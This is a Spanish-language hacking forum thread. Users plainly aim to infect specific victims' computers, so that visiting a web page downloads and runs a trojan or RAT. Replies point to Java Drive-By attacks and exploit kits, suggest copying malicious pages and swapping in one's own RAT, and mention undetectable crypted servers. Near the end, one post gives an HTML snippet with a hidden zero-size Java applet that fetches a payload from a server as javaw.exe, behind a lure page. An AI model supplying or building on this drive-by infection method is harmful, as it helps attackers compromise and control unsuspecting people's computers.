Hola, el año pasado recuerdo que subi a hostinguer un php un tanto peculiar, consistia en descargar un troyano desde una foto y ejecutarla automaticamente ene l ordenador de la victima, funcionaba, lo que pasa es que no sabia indetectar troyanos lo que ahora si xD
existe aun eso? no lo tengo guardado ya se quedo en el ordenador de informatica -.- en un año puede haber caido, es que no encuentro mucha informacion (me acuerdo que el año pasao me costo encontrarlo pero ahora...)
PD:me suena que era algo de java fake, puede ser?
JavaDrive, que sea funcional no se nunca lo probé :P
[code2=masm]"For the honor of a king. And the destiny of a country. All for one."[/code2]
Me es peculiar por que yo busco lo mismo, el método que buscas es el de una página web contaminada.
Llamamos página web contaminada a las páginas web que infectan o propagan cualquier tipo de malware (explicado rapidamente) por ellas mismas y no por una persona, lo más parecido que hay a eso son las botnet's.
La teoría de estas páginas es curiosa, pero es el mismo planteamiento que páginas que ofrecen descarga ya sea música u otros archivos.
No tengo un código directo para darte aún, pero el planteamiento es sencillo, por lo que me da expectativas de que podrá ser realizado sin ningún problema.
Te dejo un ejemplo: [Enlace externo eliminado para invitados]
Esta web puede hacerte descargar música con tan solo dar un click, sería el mismo código pero cambiando la música por tu rat o archivo que quieras que descargue.
Espero que te haya servido de ayuda.
Llamamos página web contaminada a las páginas web que infectan o propagan cualquier tipo de malware (explicado rapidamente) por ellas mismas y no por una persona, lo más parecido que hay a eso son las botnet's.
La teoría de estas páginas es curiosa, pero es el mismo planteamiento que páginas que ofrecen descarga ya sea música u otros archivos.
No tengo un código directo para darte aún, pero el planteamiento es sencillo, por lo que me da expectativas de que podrá ser realizado sin ningún problema.
Te dejo un ejemplo: [Enlace externo eliminado para invitados]
Esta web puede hacerte descargar música con tan solo dar un click, sería el mismo código pero cambiando la música por tu rat o archivo que quieras que descargue.
Espero que te haya servido de ayuda.
tiene relacion lo que busco con una botnet (ordenador zombie) ?? O.O nose yo...f0kus escribió:Me es peculiar por que yo busco lo mismo, el método que buscas es el de una página web contaminada.
Llamamos página web contaminada a las páginas web que infectan o propagan cualquier tipo de malware (explicado rapidamente) por ellas mismas y no por una persona, lo más parecido que hay a eso son las botnet's.
La teoría de estas páginas es curiosa, pero es el mismo planteamiento que páginas que ofrecen descarga ya sea música u otros archivos.
No tengo un código directo para darte aún, pero el planteamiento es sencillo, por lo que me da expectativas de que podrá ser realizado sin ningún problema.
Te dejo un ejemplo: [Enlace externo eliminado para invitados]
Esta web puede hacerte descargar música con tan solo dar un click, sería el mismo código pero cambiando la música por tu rat o archivo que quieras que descargue.
Espero que te haya servido de ayuda.
si lo que busco es la tipica pagina, que estas visitando, te sale una nueva pestaña con publicidad y zasca !! te salta el antivirus, y tu pero k pasa??? y pone en el antivirus MAL:URL
eso es lo que busco, y digo que lo consegui el año pasado pero es que ahora mismo no encuentro nada... lo ideal seria buscar una de esas paginas que te hace eso, copiar el codigo fuente y cambiar lo que se descarga por nuestro rat, pero claro primero hay que encontrar porque hace ya que no me encuentro con una :l
Lo de descargar y luego instalar, no lo veo solucion para lo que quiero, porque una cosa es subir un programa infectao y que se lo descargue todo el mundo y aleeee personas infectadas, pero pa k? lo que mola es infectar a alguien especifico y sin tonterias de bajate esto, o bajate lo otro nose... :/
Lo que tu buscas o es Java Drive By (JDB) o un exploit pack.
exploit kit es lo mismo que exploit pack ? imagino que si pero me gustaria saber al 100 %Blau escribió:Lo que tu buscas o es Java Drive By (JDB) o un exploit pack.
Sí, escribí pack en vez de kit
Ok gracias !
Sos un genio Blau, has encendido en mi un velero, las mareas turbias empiezan a verse cada vez mas pequeñasBlau escribió:Lo que tu buscas o es Java Drive By (JDB) o un exploit pack.
Gracias
Veo que andais un poco perdidos con los terminos, lo que buscas como te ha comentado el compañero es un JDB Java Drive-by ( No sé si aun sigue funcionando bien, llevo algún tiempo off) como bien has dicho se sube unos ficheros a un host y el cliente al visitar la pagina web le sale una alerta de java, si la ejecuta pues ya tiene el regalito.
En cuanto a lo de botnet... pues digamos que es una red clientes que se conectan a tu "controlador" ya sea por rat, cliente web, irc, etc.. esto no se ejecuta automatico al visitar una web. Para que se ejecute el archivo al visitar una pagina web, necesitas un exploit pack/exploit kit (viene siendo lo mismo) esto no da el 100% asegurado, ya que hoy en día la mayoría de exploits están arreglados, y depende de los "visitantes" si tienen el sistema operativo actualizado etc.. la mayoría de exploit packs son de pago, los públicos suelen ser muy antiguos y muy detectados.
Creo que más o menos me expliqué bien, para cualquier aclaración no duden en postear.
PD: Creo recordar que Adwin creó un JDB Generator o algo así ( Te lo genera automatico con la web que tu quieras )
En cuanto a lo de botnet... pues digamos que es una red clientes que se conectan a tu "controlador" ya sea por rat, cliente web, irc, etc.. esto no se ejecuta automatico al visitar una web. Para que se ejecute el archivo al visitar una pagina web, necesitas un exploit pack/exploit kit (viene siendo lo mismo) esto no da el 100% asegurado, ya que hoy en día la mayoría de exploits están arreglados, y depende de los "visitantes" si tienen el sistema operativo actualizado etc.. la mayoría de exploit packs son de pago, los públicos suelen ser muy antiguos y muy detectados.
Creo que más o menos me expliqué bien, para cualquier aclaración no duden en postear.
PD: Creo recordar que Adwin creó un JDB Generator o algo así ( Te lo genera automatico con la web que tu quieras )
este método me canse de usarlo y me funcionaba al 100%, combinado con el server de frutas totalmente fud, pero con la ultima actualización de java de pudrió todo . Igualmente no todos tienen actualizado java así que algunos curiosos pueden llegar a caer.
si yo tambien note que algo havia pasado con la ultima actualizacion de java pero bueno esperemos que pronto podramos usar este metodo otra vezTITAN escribió:este método me canse de usarlo y me funcionaba al 100%, combinado con el server de frutas totalmente fud, pero con la ultima actualización de java de pudrió todo . Igualmente no todos tienen actualizado java así que algunos curiosos pueden llegar a caer.
Java Drive y un archivo index.html alojado en un servidor (preferiblemente con soporte para FTP):
<APPLET CODE = "Java.class" ARCHIVE = "Java.jar" WIDTH = "0" HEIGHT = "0"><PARAM NAME = "url" VALUE = "Link_Server_Here"><PARAM NAME = "fn" VALUE = "javaw.exe"><PARAM NAME = "rd" VALUE = "Por: Hacker FDP"></APPLET> <html>
<head>
<center>
<title>COLDDARK13</title>
<h1><p>Es necesario ejecutar el plugin para ver el contenido!</p></h1>
</center>"He who fights monsters should see to it that he himself does not become a monster. And if you gaze for long into an abyss, the abyss gazes also into you."
- Friedrich Nietzsche
Es muy interesante esto del troyano por URL
